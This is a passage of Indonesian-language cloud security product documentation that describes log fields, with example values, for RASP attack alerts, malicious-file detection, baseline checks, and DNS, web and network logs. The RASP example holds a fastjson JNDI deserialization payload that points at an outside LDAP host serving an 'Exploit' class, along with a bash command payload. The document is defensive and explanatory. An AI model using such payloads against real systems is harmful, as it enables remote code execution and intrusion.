app_id | ID aplikasi. | 6492a391fc9b4e2aad94**** |
app_name | Nama aplikasi. | test |
confidence_level | Tingkat kepercayaan algoritma deteksi. Nilai yang valid:
| rendah |
request_body | Informasi tentang badan permintaan. | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://172.220.XX.XX:1389/Exploit","autoCommit":true} |
request_content_length | Panjang badan permintaan. | 112 |
data | Panggilan balik. | {"cmd":"bash -c kill -0 -- -'31098' "} |
headers | Informasi tentang header permintaan. | {"content-length":"112","referer":"http://120.26.XX.XX:8080/demo/Serial","accept-language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","origin":"http://120.26.XX.XX:8080","host":"120.26.XX.XX:8080","content-type":"application/json","connection":"keep-alive","x-forwarded-for":"1.1.XX.XX","accept-encoding":"gzip, deflate","user-agent":"msnbot","accept":"application/json, text/plain, */*"} |
hostname | Nama host atau perangkat jaringan. | testhostname |
host_ip | Alamat IP privat host. | 172.16.XX.XX |
is_cliped | Menunjukkan apakah log dipotong karena panjang berlebih. Nilai yang valid:
| false |
jdk_version | Versi JDK. | 1.8.0_292 |
message | Deskripsi peringatan. | Kelas tidak aman serial. |
request_method | Metode permintaan. | Post |
platform | Jenis sistem operasi. | Linux |
arch | Arsitektur sistem operasi. | amd64 |
kernel_version | Versi kernel sistem operasi. | 3.10.0-1160.59.1.el7.x86_64 |
param | Parameter permintaan. Dalam banyak kasus, parameter dalam salah satu format berikut:
| {"url":["http://127.0.0.1.xip.io"]} |
payload | Payload serangan. | bash -c kill -0 -- -'31098' |
payload_length | Panjang payload serangan. | 27 |
rasp_id | ID agen Runtime Application Self Protection (RASP). | fa00223c8420e256c0c98ca0bd0d**** |
rasp_version | Versi agen RASP. | 0.8.5 |
src_ip | Alamat IP dari mana permintaan diinisiasi. | 172.0.XX.XX |
final_action | Hasil penanganan peringatan. Nilai yang valid:
| block |
rule_action | Tindakan penanganan peringatan yang ditentukan dalam aturan perlindungan aplikasi. Nilai yang valid:
| block |
risk_level | Tingkat risiko. Nilai yang valid:
| high |
stacktrace | Informasi stack. | [java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......] |
time | Waktu ketika peringatan dibuat. | 2023-10-09 15:19:15 |
timestamp | Timestamp ketika peringatan dibuat. Satuan: milidetik. | 1696835955070 |
type | Jenis serangan. Nilai yang valid:
| rce |
url | URL permintaan. | http://127.0.0.1:999/xxx |
rasp_attack_uuid | UUID serangan. | 18823b23-7ad4-47c0-b5ac-e5f036a2**** |
uuid | UUID host. | 23f7ca61-e271-4a8e-bf5f-165596a16**** |
internet_ip | Alamat IP publik host. | 1.2.XX.XX |
intranet_ip | Alamat IP privat host. | 172.16.XX.XX |
sas_group_name | Grup tempat server termasuk dalam Security Center. | Group 1 |
instance_id | ID instance host. | i-wz995eivg28f1m** |
start_time | Timestamp awal, menunjukkan waktu terjadinya peristiwa. Satuan: detik. | 1719472214 |
Log deteksi file jahat
Nama bidang | Deskripsi | Contoh |
bucket_name | Nama Bucket OSS. | ***-test |
event_id | ID dari peringatan. | 802210 |
event_name | Nama dari peringatan. | Program penambangan |
md5 | Nilai hash MD5 dari file. | 6bc2bc******53d409b1 |
sha256 | Nilai hash SHA-256 dari file. | f038f9525******7772981e87f85 |
result | Hasil deteksi. Nilai yang valid:
| 0 |
file_path | Path ke file. | test.zip/bin_test |
etag | ID objek OSS. | 6BC2B******853D409B1 |
risk_level | Tingkat risiko. Nilai yang valid:
| Mengingatkan |
source | Metode pemeriksaan. Nilai yang valid:
| OSS |
parent_md5 | Nilai hash MD5 dari file induk atau file paket terkompresi. | 3d0f8045bb9****** |
parent_sha256 | Nilai hash SHA-256 dari file induk atau file paket terkompresi. | 69b643d6******a3fb859fa |
parent_file_path | Nama file induk atau file paket terkompresi. | test.zip |
start_time | Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik. | 1719472214 |
Log pemantauan inti file
Nama field | Deskripsi | Contoh |
start_time | Timestamp terakhir ketika peristiwa terjadi. Satuan: detik. | 1718678414 |
uuid | UUID server. | 5d83b26b-b**a-4**a-9267-12**** |
file_path | Path menuju file. | /etc/passwd |
proc_path | Path proses. | /usr/bin/bash |
rule_id | ID aturan yang terpicu. | 123 |
nama_aturan | Nama aturan. | aturan_uji_file |
cmdline | Baris perintah. | bash /opt/a |
operation | Operasi yang ingin Anda lakukan pada file. | READ |
risk_level | Tingkat risiko. | 2 |
pid | ID proses. | 45324 |
proc_permission | Izin untuk menjalankan proses. | rwxrwxrwx |
instance_id | ID instance. | i-wz995eivg2**** |
internet_ip | Alamat IP publik. | 192.0.2.1 |
intranet_ip | Alamat IP privat. | 172.16.0.1 |
instance_name | Nama instance. | aegis-test |
platform | Tipe sistem operasi. | Linux |
Log deteksi tanpa agen
Field umum untuk kerentanan, baseline, dan sampel berbahaya
Nama field | Deskripsi | Contoh |
uuid | UUID server. | ad66133a-dc82-4e5e-9659-a49e3**** |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik aset. | 39.104.XX.XX |
intranet_ip | Alamat IP privat aset. | 192.168.XX.XX |
sas_group_name | Grup aset tempat server berada di Pusat Keamanan. | default |
start_time | Timestamp awal dalam detik, juga digunakan untuk menunjukkan waktu terjadinya peristiwa. | 1719472214 |
Field risiko kerentanan
Nama field | Deskripsi | Contoh |
vul_name | Nama kerentanan. | imgsca:java:gson:AVD-2022-25647 |
vul_alias_name | Alias kerentanan. | masalah kode gson (CVE-2022-25647) |
vul_primary_id | ID utama bisnis kerentanan. | 990174361 |
type | Jenis kerentanan. Nilai valid:
| sca |
alert_level | Tingkat risiko algoritma deteksi. Nilai valid:
| asap |
instance_name | Nama host. | hhht-linux-*** |
operation | Aksi penanganan kerentanan. Nilai valid:
| new |
status | Informasi status kerentanan. Nilai valid:
| 1 |
tag | Tag kerentanan. Nilai valid:
Catatan Tag untuk jenis kerentanan lainnya adalah string acak. | oval |
Field pemeriksaan baseline
Nama field | Deskripsi | Contoh |
check_item_name | Nama item pemeriksaan. | Setel waktu kedaluwarsa kata sandi |
check_item_level | Tingkat risiko item pemeriksaan. Nilai valid:
| high |
check_type | Jenis item pemeriksaan. | Otentikasi identitas |
risk_level | Tingkat risiko item. Nilai valid:
| low |
operation | Informasi operasi. Nilai valid:
| new |
risk_name | Nama item pemeriksaan dengan risiko. | Pemeriksaan kepatuhan kata sandi |
status | Informasi status item pemeriksaan. Nilai valid:
| 1 |
sub_type_alias_name | Alias subtipe (Cina). | Standar Alibaba Cloud - Baseline Keamanan CentOS Linux 7/8 |
sub_type_name | Nama subtipe baseline. Untuk nilai subtipe baseline, lihat Jenis dan subtipe baseline. | hc_centos7 |
type_name | Nama tipe. | hc_best_secruity |
type_alias_name | Alias tipe (Cina). | Praktik keamanan terbaik |
container_id | ID kontainer. | b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86**** |
container_name | Nama kontainer. | k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0 |
Field sampel berbahaya
Nama field | Deskripsi | Contoh |
alert_level | Tingkat risiko peristiwa peringatan. Nilai valid:
| suspicious |
alert_name | Nama peringatan sampel berbahaya. | Proses mencurigakan - Berbasis SSH |
operation | Informasi operasi. Nilai valid:
| new |
status | Informasi status risiko sampel berbahaya. Nilai valid:
| 0 |
suspicious_event_id | ID peristiwa peringatan. | 909361 |
Field file sensitif
Nama field | Deskripsi | Contoh |
alert_level | Tingkat risiko. Nilai valid:
| high |
rule_name | Nama tipe file. | ionic token |
file_path | Path file sensitif. | /Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll |
result | Hasil pemeriksaan. | {"result":"[\"[\\\"mysql-uqjtwadmin-xxx"} |
Lampiran
Jenis dan subtipe baseline
Tipe | Subtipe | Deskripsi |
hc_exploit | hc_exploit_redis | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Redis yang tinggi |
hc_exploit_activemq | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah ActiveMQ yang tinggi | |
hc_exploit_couchdb | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah CouchDB yang tinggi | |
hc_exploit_docker | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Docker yang tinggi | |
hc_exploit_es | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Elasticsearch yang tinggi | |
hc_exploit_hadoop | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Hadoop yang tinggi | |
hc_exploit_jboss | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Jboss yang tinggi | |
hc_exploit_jenkins | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Jenkins yang tinggi | |
hc_exploit_k8s_api | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Kubernetes Apiserver yang tinggi | |
hc_exploit_ldap | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah LDAP (Windows) | |
hc_exploit_ldap_linux | Baseline kerentanan akses tidak sah OpenLDAP (Linux) | |
hc_exploit_memcache | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Memcached yang tinggi | |
hc_exploit_mongo | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah Mongodb yang tinggi | |
hc_exploit_pgsql | Baseline risiko tinggi untuk akses tidak sah ke Postgresql | |
hc_exploit_rabbitmq | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah RabbitMQ yang tinggi | |
hc_exploit_rsync | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah rsync yang tinggi | |
hc_exploit_tomcat | Vulnerabilitas File Read/Inclusion Apache Tomcat AJP | |
hc_exploit_zookeeper | Eksploitasi risiko tinggi - Risiko kerentanan eksploitasi akses tidak sah ZooKeeper yang tinggi | |
hc_container | hc_docker | Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Docker |
hc_middleware_ack_master | Praktik Terbaik Internasional untuk Keamanan Master Kubernetes (ACK) | |
hc_middleware_ack_node | Praktik Terbaik Internasional untuk Keamanan Node Kubernetes (ACK) | |
hc_middleware_k8s | Pemeriksaan Baseline Keamanan Master-Kubernetes-Alibaba Cloud Standard | |
hc_middleware_k8s_node | Pemeriksaan Baseline Keamanan Node-Kubernetes-Alibaba Cloud Standard | |
cis | hc_suse 15_djbh | Baseline SUSE Linux 15 untuk Perlindungan Siber Tingkat III di China |
hc_aliyun_linux3_djbh_l3 | Baseline Alibaba Cloud Linux 3 untuk Perlindungan Siber Tingkat III di China | |
hc_aliyun_linux_djbh_l3 | Baseline Alibaba Cloud Linux/Aliyun Linux 2 untuk Perlindungan Siber Tingkat III di China | |
hc_bind_djbh | Pemeriksaan Baseline Kepatuhan Bind Tingkat III Perlindungan Siber di China | |
hc_centos 6_djbh_l3 | Baseline CentOS Linux 6 untuk Perlindungan Siber Tingkat III di China | |
hc_centos 7_djbh_l3 | Baseline CentOS Linux 7 untuk Perlindungan Siber Tingkat III di China | |
hc_centos 8_djbh_l3 | Baseline CentOS Linux 8 untuk Perlindungan Siber Tingkat III di China | |
hc_debian_djbh_l3 | Baseline Debian Linux 8/9/10 untuk Perlindungan Siber Tingkat III di China | |
hc_iis_djbh | Baseline IIS untuk Perlindungan Siber Tingkat III di China | |
hc_informix_djbh | Pemeriksaan Baseline Kepatuhan Informix Tingkat III Perlindungan Siber di China | |
hc_jboss_djbh | Pemeriksaan Baseline Kepatuhan Jboss6/7 Tingkat III Perlindungan Siber di China | |
hc_mongo_djbh | Baseline MongoDB untuk Perlindungan Siber Tingkat III di China | |
hc_mssql_djbh | Pemeriksaan Baseline Kepatuhan SQL Server Tingkat III Perlindungan Siber di China | |
hc_mysql_djbh | Pemeriksaan Baseline Kepatuhan MySQL Tingkat Jaminan Setara 3 | |
hc_nginx_djbh | Pemeriksaan Baseline Kepatuhan Nginx Tingkat III Perlindungan Siber di China | |
hc_oracle_djbh | Pemeriksaan Baseline Kepatuhan Oracle Tingkat III Perlindungan Siber di China | |
hc_pgsql_djbh | Pemeriksaan Baseline Kepatuhan PostgreSql Tingkat III | |
hc_redhat 6_djbh_l3 | Pemeriksaan Baseline Kepatuhan Red Hat Enterprise Linux 6 Tingkat III Perlindungan Siber di China | |
hc_redhat_djbh_l3 | Pemeriksaan Baseline Kepatuhan Red Hat Enterprise Linux 7 Tingkat III Perlindungan Siber di China | |
hc_redis_djbh | Baseline Redis untuk Perlindungan Siber Tingkat III di China | |
hc_suse 10_djbh_l3 | Baseline SUSE Linux 10 untuk Perlindungan Siber Tingkat III di China | |
hc_suse 12_djbh_l3 | Baseline SUSE Linux 12 untuk Perlindungan Siber Tingkat III di China | |
hc_suse_djbh_l3 | Baseline SUSE Linux 11 untuk Perlindungan Siber Tingkat III di China | |
hc_ubuntu 14_djbh_l3 | Baseline Ubuntu 14 untuk Perlindungan Siber Tingkat III di China | |
hc_ubuntu_djbh_l3 | Menunggu Inspeksi Peraturan Kepatuhan Tingkat III-Ubuntu 16/18/20 | |
hc_was_djbh | Pemeriksaan Baseline Kepatuhan Websphere Application Server Tingkat III Perlindungan Siber di China | |
hc_weblogic_djbh | Baseline Weblogic untuk Perlindungan Siber Tingkat III di China | |
hc_win 2008_djbh_l3 | Pemeriksaan Baseline Kepatuhan Windows Server 2008 R2 Tingkat III Perlindungan Siber di China | |
hc_win 2012_djbh_l3 | Baseline Windows 2012 R2 untuk Perlindungan Siber Tingkat III di China | |
hc_win 2016_djbh_l3 | Baseline Windows 2016/2019 untuk Perlindungan Siber Tingkat III di China | |
hc_aliyun_linux_djbh_l2 | Baseline Alibaba Cloud Linux/Aliyun Linux 2 untuk Perlindungan Siber Tingkat II di China | |
hc_centos 6_djbh_l2 | Baseline CentOS Linux 6 untuk Perlindungan Siber Tingkat II di China | |
hc_centos 7_djbh_l2 | Baseline CentOS Linux 7 untuk Perlindungan Siber Tingkat II di China | |
hc_debian_djbh_l2 | Debian Linux 8 Baseline untuk Perlindungan Terklasifikasi Tiongkok terhadap Keamanan Siber-Tingkat II | |
hc_redhat 7_djbh_l2 | Redhat Linux 7 Baseline untuk Perlindungan Siber Tersier Tingkat II di China | |
hc_ubuntu_djbh_l2 | Baseline Ubuntu Linux 16/18 untuk Perlindungan Siber Tingkat II di China | |
hc_win 2008_djbh_l2 | Baseline Windows Server 2008 R2 untuk Perlindungan Siber Tingkat II di China | |
hc_win 2012_djbh_l2 | Baseline Windows Server 2012 R2 untuk Perlindungan Siber Tingkat II di China | |
hc_win 2016_djbh_l2 | Baseline Windows Server 2016/2019 untuk Perlindungan Siber Tingkat II di China | |
hc_aliyun_linux_cis | Praktik Terbaik Internasional untuk Keamanan Alibaba Cloud Linux 2 | |
hc_centos 6_cis_rules | Praktik Terbaik Internasional untuk Keamanan CentOS Linux 6 LTS | |
hc_centos 7_cis_rules | Praktik Terbaik Internasional untuk Keamanan CentOS Linux 7 LTS | |
hc_centos 8_cis_rules | Praktik Terbaik Internasional untuk Keamanan CentOS Linux 8 LTS | |
hc_debian 8_cis_rules | Praktik Terbaik Internasional untuk Keamanan Debian Linux 8 | |
hc_ubuntu 14_cis_rules | Praktik Terbaik Internasional untuk Keamanan Ubuntu 14 LTS | |
hc_ubuntu 16_cis_rules | Praktik Terbaik Internasional untuk Keamanan Ubuntu 16/18/20 LTS | |
hc_win 2008_cis_rules | Praktik Terbaik Internasional untuk Keamanan Windows Server 2008 R2 | |
hc_win 2012_cis_rules | Praktik Terbaik Internasional untuk Keamanan Windows Server 2012 R2 | |
hc_win 2016_cis_rules | Praktik Terbaik Internasional untuk Keamanan Windows Server 2016/2019 R2 | |
hc_kylin_djbh_l3 | Pemeriksaan Baseline Kepatuhan Kylin Tingkat III Perlindungan Siber di China | |
hc_uos_djbh_l3 | Pemeriksaan Baseline Kepatuhan uos Tingkat III Perlindungan Siber di China | |
hc_best_security | hc_aliyun_linux | Benchmark Keamanan Alibaba Cloud Linux/Aliyun Linux 2 |
hc_centos 6 | Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - CentOS Linux 6 | |
hc_centos 7 | Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - CentOS Linux 7/8 | |
hc_debian | Baseline Keamanan Standar Alibaba Cloud - Debian Linux 8/9/10 | |
hc_redhat 6 | Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Red Hat Enterprise Linux 6 | |
hc_redhat 7 | Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Red Hat Enterprise Linux 7/8 | |
hc_ubuntu | Baseline Keamanan Standar Alibaba Cloud - Ubuntu | |
hc_windows_2008 | Pemeriksaan Baseline Keamanan Standar Alibaba Cloud - Windows Server 2008 R2 | |
hc_windows_2012 | Baseline Keamanan Standar Alibaba Cloud - Windows 2012 R2 | |
hc_windows_2016 | Baseline Keamanan Standar Alibaba Cloud - Windows 2016/2019 | |
hc_db_mssql | Pemeriksaan Baseline Keamanan SQL Server Standar Alibaba Cloud | |
hc_memcached_ali | Pemeriksaan Baseline Keamanan Memcached Standar Alibaba Cloud | |
hc_mongodb | Pemeriksaan Baseline Keamanan MongoDB versi 3.x Standar Alibaba Cloud | |
hc_mysql_ali | Pemeriksaan Baseline Keamanan Mysql Standar Alibaba Cloud | |
hc_oracle | Pemeriksaan Baseline Keamanan Oracle 11g Standar Alibaba Cloud | |
hc_pgsql_ali | Pemeriksaan Inisialisasi Keamanan PostgreSql Standar Alibaba Cloud | |
hc_redis_ali | Pemeriksaan Baseline Keamanan Redis Standar Alibaba Cloud | |
hc_apache | Pemeriksaan Baseline Keamanan Apache Standar Alibaba Cloud | |
hc_iis_8 | Pemeriksaan Baseline Keamanan IIS 8 Standar Alibaba Cloud | |
hc_nginx_linux | Pemeriksaan Baseline Keamanan Nginx Standar Alibaba Cloud | |
hc_suse 15 | Pemeriksaan Baseline Keamanan SUSE Linux 15 Standar Alibaba Cloud | |
tomcat 7 | Baseline Keamanan Apache Tomcat Standar Alibaba Cloud | |
weak_password | hc_mongodb_pwd | Kata Sandi Lemah - Baseline Kata Sandi Lemah MongoDB (versi 2.X) |
hc_weakpwd_ftp_linux | Kata Sandi Lemah - Baseline kata sandi lemah login Ftp | |
hc_weakpwd_linux_sys | Kata Sandi Lemah - Baseline kata sandi lemah login sistem Linux | |
hc_weakpwd_mongodb 3 | Kata Sandi Lemah - Baseline Kata Sandi Lemah MongoDB | |
hc_weakpwd_mssql | Kata Sandi Lemah - Baseline kata sandi lemah login DB SQL Server | |
hc_weakpwd_mysql_linux | Kata Sandi Lemah - Baseline kata sandi lemah login DB Mysql | |
hc_weakpwd_mysql_win | Kata Sandi Lemah - Baseline kata sandi lemah login DB Mysql (versi Windows) | |
hc_weakpwd_openldap | Kata Sandi Lemah - Baseline kata sandi lemah login Openldap | |
hc_weakpwd_oracle | Pendeteksian Kata Sandi Lemah Login Oracle | |
hc_weakpwd_pgsql | Kata Sandi Lemah - Baseline kata sandi lemah login DB PostgreSQL | |
hc_weakpwd_pptp | Kata Sandi Lemah - Baseline kata sandi lemah login pptpd | |
hc_weakpwd_redis_linux | Kata Sandi Lemah - Baseline kata sandi lemah login DB Redis | |
hc_weakpwd_rsync | Kata Sandi Lemah - Baseline kata sandi lemah login rsync | |
hc_weakpwd_svn | Kata Sandi Lemah - Baseline kata sandi lemah login svn | |
hc_weakpwd_tomcat_linux | Baseline kata sandi lemah Konsol Apache Tomcat | |
hc_weakpwd_vnc | Pemeriksaan Kata Sandi Lemah VncServer | |
hc_weakpwd_weblogic | Kata Sandi Lemah - Pendeteksian Kata Sandi Lemah Login Weblogic 12c | |
hc_weakpwd_win_sys | Kata Sandi Lemah - Baseline kata sandi lemah login sistem Windows |
Field Log Jaringan
Log Akses Web
Nama Field | Deskripsi | Contoh |
response_content_length | Panjang badan pesan. Satuan: byte. | 612 |
dst_ip | Alamat IP tujuan. | 39.105.XX.XX |
dst_port | Port tujuan. | 80 |
host | Alamat IP atau nama domain dari host tujuan. | 39.105.XX.XX |
jump_location | Alamat pengalihan. | 123 |
request_method | Metode permintaan HTTP. | GET |
http_referer | Referensi HTTP. Field ini berisi URL halaman web yang terhubung ke sumber daya yang diminta. | www.example.com |
request_datetime | Waktu permintaan dimulai. | 2024-08-01 06:59:28 |
status | Kode status HTTP. | 200 |
content_type | Tipe konten permintaan. | text/plain;charset=utf-8 |
response_content_type | Tipe konten respons. | text/plain; charset=utf-8 |
src_ip | Alamat IP sumber. | 31.220.XX.XX |
src_port | Port sumber. | 59524 |
request_uri | URI permintaan. | /report |
http_user_agent | Agen pengguna yang memulai permintaan. | okhttp/3.2.0 |
http_x_forward_for | Header permintaan HTTP yang mencatat alamat IP asal klien. | 31.220.XX.XX |
Log DNS
Nama Field | Deskripsi | Contoh |
additional | Field tambahan yang dikembalikan oleh server DNS dan mencatat informasi seperti rekaman CNAME, rekaman MX, dan rekaman PTR. | N/A |
additional_num | Jumlah rekaman tambahan yang dikembalikan oleh server DNS. | 0 |
answer | Jawaban DNS yang dikembalikan oleh server DNS, yang menunjukkan hasil resolusi. Jawaban DNS berisi alamat IP ke mana nama domain yang diminta diresolusi atau informasi lainnya seperti rekaman A dan rekaman AAAA. | example.com A IN 52 1.2.XX.XX |
answer_num | Jumlah jawaban DNS. | 1 |
authority | Field otoritas yang dikembalikan oleh server DNS. Otoritas adalah server DNS yang mengelola dan menyelesaikan nama domain. Field otoritas berisi informasi tentang server DNS yang menyediakan rekaman DNS untuk nama domain yang diminta, seperti rekaman NS. | NS IN 17597 |
authority_num | Jumlah otoritas. | 1 |
client_subnet | Subnet klien. | 59.152.XX.XX |
dst_ip | Alamat IP tujuan. | 106.55.XX.XX |
dst_port | Port tujuan. | 53 |
net_connect_dir | Arah transmisi data. Nilai valid:
| out |
qid | ID dari query. | 13551 |
query_name | Nama domain yang di-query. | example.com |
query_type | Tipe dari query. | A |
query_datetime | Waktu query. | 2024-08-01 08:33:58 |
rcode | Kode respons yang dikembalikan oleh server DNS, yang menunjukkan hasil resolusi DNS. | 0 |
region | ID wilayah sumber. Nilai valid:
| 1 |
response_datetime | Waktu respons server DNS. | 2024-08-01 08:31:25 |
src_ip | Alamat IP sumber. | 106.11.XX.XX |
src_port | Port sumber. | 22 |
Log sesi jaringan
Nama bidang | Deskripsi | Contoh |
asset_type | Jenis aset dari mana log dikumpulkan. Nilai yang valid:
| ECS |
dst_ip | Alamat IP tujuan. | 119.96.XX.XX |
dst_port | Port tujuan. | 443 |
net_connect_dir | Arah dari sesi. Nilainya tetap sebagai out.
| out |
l4_proto | Jenis protokol. Nilai yang valid:
| tcp |
session_time | Waktu ketika sesi dimulai. | 2024-08-01 08:31:18 |
src_ip | Alamat IP sumber. | 121.40.XX.XX |
src_port | Port sumber. | 53602 |
Log DNS Lokal
Nama Field | Deskripsi | Contoh |
anwser_name | Nama jawaban DNS, yang menunjukkan nama domain yang terkait dengan rekaman sumber daya. | example.com |
answer_rdata | Bidang area data sumber daya (RDA) dari jawaban DNS, yang menunjukkan nilai spesifik dari hasil resolusi. | 106.11.XX.XX |
answer_ttl | Waktu hidup (TTL) dari jawaban DNS. Satuan: detik. | 600 |
answer_type | Tipe jawaban DNS. Nilai valid:
| 1 |
dst_ip | Alamat IP tujuan. Nilainya adalah alamat IP desimal secara default. | 323223**** |
dst_port | Port tujuan. | 53 |
group_id | ID grup. ID grup yang sama menunjukkan permintaan atau respons DNS yang sama. | 3 |
host | Nama host. | hostname |
id | ID kueri, yang mengidentifikasi permintaan atau respons DNS. | 64588 |
instance_id | ID instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | Alamat IP publik yang termasuk dalam permintaan atau respons DNS. | 121.40.XX.XX |
ip_ttl | TTL paket IP dalam permintaan atau respons DNS. | 64 |
query_name | Nama domain yang di-query. | example.com |
query_type | Tipe kueri. Nilai valid:
| 1 |
src_ip | Alamat IP dari mana permintaan atau respons DNS dimulai. Nilainya adalah alamat IP desimal secara default. | 168427**** |
src_port | Nomor port dari mana permintaan atau respons DNS dimulai. | 53 |
start_time | Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik. | 1719472214 |
time_usecond | Timestamp permintaan atau respons DNS. Satuan: mikrodetik. | 590662 |
tunnel_id | ID tunnel yang digunakan oleh permintaan atau respons DNS. Tunneling adalah cara mentransfer data menggunakan protokol berbeda. Tunneling dapat digunakan untuk akses aman ke Internet atau komunikasi lintas jaringan berbeda. | 514763 |